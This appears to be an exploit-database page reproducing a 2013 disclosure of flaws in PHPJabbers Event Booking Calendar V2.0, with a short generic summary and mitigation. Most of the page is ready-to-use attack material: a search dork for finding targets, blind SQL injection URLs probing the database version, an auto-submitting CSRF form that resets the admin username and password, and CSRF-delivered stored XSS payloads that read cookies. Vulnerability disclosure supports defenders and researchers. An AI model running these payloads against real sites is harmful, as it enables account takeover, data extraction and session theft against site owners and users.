header-logo
Suggest Exploit
vendor:
Event Booking Calendar
by:
HackXBack
8,8
CVSS
HIGH
Multiple Blind Injection, Cross Site Request Forgery, Multiple Cross Site Scripting
89,352,79
CWE
Product Name: Event Booking Calendar
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: NO
Related CWE: N/A
CPE: 2.3:a:phpjabbers:event_booking_calendar:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Event Booking Calendar V2.0 – Multiple Vulnerabilities

The Event Booking Calendar V2.0 is vulnerable to multiple Blind Injection, Cross Site Request Forgery and Multiple Cross Site Scripting. An attacker can exploit these vulnerabilities by sending malicious requests to the vulnerable website. For example, an attacker can send a malicious request to the vulnerable website with a crafted URL containing an injection payload. The attacker can also exploit the Cross Site Request Forgery vulnerability by sending a malicious request with a crafted HTML form containing the username and password of the admin. Finally, the attacker can exploit the Multiple Cross Site Scripting vulnerability by sending a malicious request with a crafted HTML form containing a malicious JavaScript code.

Mitigation:

The website should implement proper input validation and sanitization to prevent malicious requests. The website should also implement proper authentication and authorization mechanisms to prevent unauthorized access.
Source

Exploit-DB raw data:

Event Booking Calendar V2.0 - Multiple Vulnerabilities
====================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : www.phpjabbers.com/event-booking-calendar/
.:. Dork           : inurl:"load-calendar.php"
####################################################################

===[ Exploit ]===

[1] multiple Blind Ijection
============================

www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1[inject]
www.site.com/script/load-calendar.php?cid=1[inject]

www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1
>>True
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2
>>False

www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5
>>True
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4
>>False



[2] Cross Site Request Forgery
==============================

[Change Username/Password Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminOptions&action=update">
<input type="hidden" name="options_update" value="1"/>
<input type="hidden" name="tab_id" value="tabs-1"/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="password"/>
</form>

</body>
</html>

[3] Multiple Cross Site Scripting
=================================

# CSRF with XSS Exploit:

I. Xss In Event


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminEvents&action=create">
<input type="hidden" name="event_create" value="1"/>
<input type="hidden" name="category_id" value="2"/>
<input type="hidden" name="event_title"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="event_description" value="12"/>
<input type="hidden" name="event_max_people" value="12"/>
<input type="hidden" name="event_color" value="FFCC00"/>
<input type="hidden" name="start[1]" value="2014-01-11 00:00"/>
<input type="hidden" name="end[1]" value="2014-01-11 00:00"/>
<input type="hidden" name="title[]" value="Regular price"/>
<input type="hidden" name="price[]" value="888"/>
<input type="hidden" name="repeat_every" value=""/>
<input type="hidden" name="repeat_ends" value="2014-01-11"/>
</form>
</body>
</html>

II. Xss In Categories


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminCategories&action=create">
<input type="hidden" name="category_create" value="1"/>
<input type="hidden" name="category_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>

####################################################################

Navigation

Suggest Exploit

Services By CQR